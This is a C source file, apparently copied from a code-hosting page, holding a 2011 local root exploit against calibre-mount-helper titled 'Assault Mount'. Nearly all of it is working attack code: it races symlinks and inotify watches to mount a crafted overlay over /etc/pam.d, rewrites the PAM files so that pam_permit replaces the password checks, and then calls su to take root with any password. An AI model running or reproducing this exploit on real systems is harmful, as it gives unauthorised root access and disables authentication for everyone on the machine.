103 lines
No EOL
3.1 KiB
C
103 lines
No EOL
3.1 KiB
C
/*
|
|
* ########################################################
|
|
* # .80 Calibrer Assault Mount #
|
|
* # by zx2c4 #
|
|
* ########################################################
|
|
*
|
|
* Yesterday's assult mount used inotify to mount into /etc/pam.d. Today we
|
|
* expand the attack by adding a race toggler so we can mount from non-block
|
|
* devices.
|
|
*
|
|
* Enjoy.
|
|
*
|
|
* - zx2c4
|
|
* 2011-11-4
|
|
*
|
|
* greets to djrbliss
|
|
*
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <sys/inotify.h>
|
|
#include <unistd.h>
|
|
#include <stdlib.h>
|
|
#include <signal.h>
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
printf("########################################################\n");
|
|
printf("# .80 Calibrer Assault Mount #\n");
|
|
printf("# by zx2c4 #\n");
|
|
printf("########################################################\n\n");
|
|
|
|
|
|
printf("[+] Cleaning up old cruft.\n");
|
|
unlink("/dev/shm/overlay");
|
|
system("calibre-mount-helper cleanup /dev/ram0 /media/staging/");
|
|
|
|
printf("[+] Creating overlay container.\n");
|
|
system("dd if=/dev/zero of=/dev/shm/overlay count=25600");
|
|
system("/usr/sbin/mkfs.ntfs /dev/shm/overlay");
|
|
|
|
printf("[+] Mounting staging using race condition toggler...\n");
|
|
int childpid = fork();
|
|
if (childpid) {
|
|
int ret;
|
|
while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /media/staging/ 2>&1")) == 256 || ret == 8192);
|
|
kill(childpid, SIGKILL);
|
|
} else {
|
|
while (1) {
|
|
rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
|
|
symlink("/dev/ram0", "/dev/shm/overlay");
|
|
unlink("/dev/shm/overlay");
|
|
rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
printf("[+] Preparing overlay with /etc/pam.d modification:\n");
|
|
system("cp -v /etc/pam.d/* /media/staging/");
|
|
system("sed -i \"s/pam_deny.so/pam_permit.so/g\" /media/staging/common-auth");
|
|
system("sed -i \"s/pam_cracklib.so.*/pam_permit.so/g\" /media/staging/system-auth");
|
|
system("sed -i \"s/pam_unix.so.*/pam_permit.so/g\" /media/staging/system-auth");
|
|
|
|
|
|
printf("[+] Mounting overlay over /etc/pam.d using race condition toggler and inotify...\n");
|
|
childpid = fork();
|
|
if (childpid) {
|
|
int childpid2 = fork();
|
|
if (childpid2) {
|
|
int ret;
|
|
while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /etc/pam.d/ 2>&1")) == 256 || ret == 8192);
|
|
kill(childpid, SIGKILL);
|
|
kill(childpid2, SIGKILL);
|
|
} else {
|
|
while (1) {
|
|
int fd;
|
|
fd = inotify_init();
|
|
unlink("/media/staging/fake");
|
|
mkdir("/media/staging/fake");
|
|
inotify_add_watch(fd, "/media/staging/fake", IN_CREATE);
|
|
read(fd, 0, 0);
|
|
rename("/media/staging/fake", "/media/staging/tmp");
|
|
symlink("/etc/pam.d", "/media/staging/fake");
|
|
rmdir("/media/staging/tmp");
|
|
close(fd);
|
|
}
|
|
}
|
|
} else {
|
|
while (1) {
|
|
rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
|
|
symlink("/dev/ram0", "/dev/shm/overlay");
|
|
unlink("/dev/shm/overlay");
|
|
rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
printf("[+] Asking for root. When prompted for a password, type anything and press enter.\n");
|
|
system("su");
|
|
|
|
return 0;
|
|
} |